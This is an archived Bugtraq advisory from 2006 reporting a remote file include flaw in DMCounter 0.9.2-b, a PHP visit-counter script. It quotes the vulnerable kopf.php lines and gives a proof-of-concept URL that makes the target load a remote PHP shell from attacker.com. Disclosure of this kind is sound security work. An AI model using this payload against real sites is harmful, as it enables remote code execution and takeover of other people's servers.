lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <7cb43cb30605010758j6f08acfawe2b141278f3708ca@mail.gmail.com>
Date: Mon, 1 May 2006 09:58:52 -0500
From: beford <xbefordx@...il.com>
To: bugs@...uritytracker.com, bugtraq@...urityfocus.com
Subject: DMCounter Remote File Include


Script: DMCounter
Version: 0.9.2-b
Language: PHP
Problem: Remote File Include
Vendor: http://sourceforge.net/projects/dmcounter
Discovered by: beford <xbefordx gmail com>

Description
=============
Statistics software based on PHP which does not require any database
support but just uses flat files. Daily + monthly visits, which pages, from
where, browsers and OSs are listed and visually presented

Problem
=============
A remote user can supply a specially crafted URL to cause the target
system to include and execute arbitrary PHP code from a remote
location. A remote user can execute arbitrary PHP code and operating
system commands on the target system with the privileges of the
target web service.

The vulnerable file is kopf.php

1 <?php
2 $basepath=getcwd();
3 include($rootdir.'/lang.php');

$rootdir is not being declared before using it in the include() function.


Proof of Concept URL
==============
http://victim.com/dmcounter/kopf.php?rootdir=http://attacker.com/phpshell.txt?

Greets:
==============
 ][GB][
 Zetha - http://odiameporsernegro.org
 uyx
 fallen - x33x37.org


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ